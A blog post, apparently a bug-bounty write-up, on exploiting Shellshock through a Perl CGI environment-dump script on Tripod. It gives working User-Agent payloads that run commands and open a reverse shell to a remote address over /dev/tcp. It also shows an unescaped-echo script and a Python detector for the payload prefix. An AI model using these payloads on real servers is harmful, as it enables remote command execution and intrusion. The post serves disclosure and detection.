While I was surfing the interwebs my eyes caught a Perl CGI script which prints out the environment variables. For example, something like this.
use CGI;

# Collect every query/form parameter into %input
$cgi = CGI->new;
for $key ( $cgi->param() ) {
    $input{$key} = $cgi->param($key);
}

# The blank line after the Content-type header ends the CGI response headers
print qq{Content-type: text/html

<html><head></head><body>
};

# Dump the whole CGI environment, including the HTTP_* variables built from request headers
foreach $key ( sort keys %ENV ) {
    print $key, ' = ', $ENV{$key}, "<br>\n";
}

# Echo the request parameters back, unescaped, straight into the HTML
for $key ( keys %input ) {
    print $key, ' = ', $input{$key}, "<br>\n";
}

print qq{<form METHOD=POST><input type="submit" value="Post Request"> <input name="postfield"></form>};
print qq{<form METHOD=GET ><input type="submit" value="Get Request "> <input name="getfield" ></form>};
print qq{</body></html>};
This would output the following.
CONTEXT_DOCUMENT_ROOT : /var/chroot/home/
DOCUMENT_ROOT : /var/chroot/home/
GATEWAY_INTERFACE : CGI/1.1
GD_PHP_HANDLER : x-httpd-php5-3
HTTP_ACCEPT : text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
HTTP_ACCEPT_ENCODING : gzip, deflate, sdch
HTTP_ACCEPT_LANGUAGE : en-US,en;q=0.8
HTTP_CONNECTION : keep-alive
HTTP_USER_AGENT : Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36
PATH : /usr/local/bin:/usr/bin:/bin
The HTTP_USER_AGENT variable is taken straight from the client's “User-Agent:” header, so we can set it to whatever input we like. Because the server's bash still imported function definitions from environment variables, the script was vulnerable to the bash Shellshock vulnerability. For example, let's inject “uname -a” and see the output.
GET xxxx HTTP/1.1
Host: perlcgial.tripod.com
User-Agent: () { :;}; echo; /bin/bash -c "uname -a"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Let's try () { :;}; echo; /bin/bash -c "/sbin/ifconfig"
Since we are arbitrarily injecting code into the bash shell we can get a reverse connection like this.
User-Agent: () { :;}; echo; /bin/bash -i >& /dev/tcp/1.1.1.1/4444 0>&1
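From the defender's side, the requests above leave a distinctive signature: a header value that begins with "() {", which CGI then exports as an HTTP_* environment variable. The following Python is an added example of mine, not code from this post or from Tripod: it parses a raw request, maps each header to the CGI variable the server would build from it, and flags values carrying that prefix; it also runs the same check over Apache combined-format log lines, where only the Referer and User-Agent fields are normally recorded. All requests, log lines, hostnames and addresses below are constructed.

```python
import re
from typing import Dict, Iterable, List, NamedTuple, Tuple

# A Shellshock payload starts with "() {": unpatched bash treated any
# environment variable whose value began that way as an exported function
# definition and kept executing whatever followed the closing brace.
# The pattern tolerates the whitespace variants "(){", "() {" and "( ) {".
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")


class Finding(NamedTuple):
    header: str    # request header that carried the payload
    env_name: str  # the HTTP_* variable a CGI server builds from that header
    value: str


def cgi_env_name(header: str) -> str:
    """Map a request header name to the variable CGI exports for it.

    CGI exports every request header this way, so the whole header block,
    not just User-Agent, ends up in the script's environment.
    """
    return "HTTP_" + header.strip().upper().replace("-", "_")


def parse_request_headers(raw: str) -> Dict[str, str]:
    """Return the header block of a raw HTTP/1.1 request as a dict.
    The request line is skipped; the first blank line ends the headers."""
    headers: Dict[str, str] = {}
    for line in raw.replace("\r\n", "\n").split("\n")[1:]:
        if not line.strip():
            break
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return headers


def scan_request(raw: str) -> List[Finding]:
    """Flag every header in a raw request whose value carries the prefix."""
    return [
        Finding(name, cgi_env_name(name), value)
        for name, value in parse_request_headers(raw).items()
        if SHELLSHOCK_RE.search(value)
    ]


# Apache "combined" log format. Apache writes a literal quote inside a
# logged field as \", so each quoted field is matched escape-aware.
_QUOTED = r'"((?:[^"\\]|\\.)*)"'
COMBINED_RE = re.compile(
    r"^(\S+) \S+ \S+ \[([^\]]+)\] " + _QUOTED + r" (\d{3}) \S+ " + _QUOTED + " " + _QUOTED + "$"
)


def scan_combined_log(lines: Iterable[str]) -> List[Tuple[str, str, str]]:
    """Return (client_ip, request_line, offending_field) for entries whose
    Referer or User-Agent carries the prefix. Other headers are not in a
    default combined log, so this is a partial check compared to raw requests."""
    hits: List[Tuple[str, str, str]] = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; a real tool would count these
        ip, _when, request, _status, referer, user_agent = m.groups()
        for field in (referer, user_agent):
            if SHELLSHOCK_RE.search(field):
                hits.append((ip, request, field))
                break
    return hits


# Constructed sample input (not real traffic): one ordinary request and one
# whose User-Agent carries the function-definition prefix.
BENIGN_REQUEST = (
    "GET /cgi-bin/env.pl HTTP/1.1\r\n"
    "Host: cgi.example.test\r\n"
    "User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36\r\n"
    "Accept: text/html,application/xhtml+xml,*/*;q=0.8\r\n"
    "\r\n"
)
SUSPECT_REQUEST = (
    "GET /cgi-bin/env.pl HTTP/1.1\r\n"
    "Host: cgi.example.test\r\n"
    'User-Agent: () { :;}; echo; /bin/bash -c "uname -a"\r\n'
    "Accept: text/html,application/xhtml+xml,*/*;q=0.8\r\n"
    "Connection: keep-alive\r\n"
    "\r\n"
)
# Constructed combined-format log lines (client addresses are documentation ranges).
SAMPLE_LOG = [
    '198.51.100.7 - - [24/Sep/2014:10:14:01 +0000] "GET /cgi-bin/env.pl HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/32.0"',
    r'203.0.113.5 - - [24/Sep/2014:10:15:32 +0000] "GET /cgi-bin/env.pl HTTP/1.1" 200 512 "-" "() { :;}; echo; /bin/bash -c \"uname -a\""',
    '198.51.100.9 - - [24/Sep/2014:10:16:10 +0000] "GET /cgi-bin/env.pl HTTP/1.1" 200 512 "-" "curl/7.38.0"',
]

if __name__ == "__main__":
    for finding in scan_request(SUSPECT_REQUEST):
        print(f"request header {finding.header} -> {finding.env_name}: {finding.value}")
    for ip, request, field in scan_combined_log(SAMPLE_LOG):
        print(f"log: {ip} {request!r} carried {field!r}")
```

The prefix check is deliberately narrow: a benign User-Agent such as "Mozilla/5.0 (Windows NT 6.2; WOW64)" has text inside its parentheses and is not flagged. The real fix is the patched bash; the scan only tells you who tried, and on which header.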
That is it, game over 🙂 This is how I owned Lycos and Tripod. As soon as I found this I reported it to them, and they have already fixed it.
By the way, koding.com was affected by the Shellshock vulnerability too.
After I reported it to them, it was successfully patched as well.
Bonus: Tripod had a reflected XSS vulnerability too.
I don’t know why it gives such a search result 😉
ha ha nice one (y) the perl script vulnerability scene is awesome 😀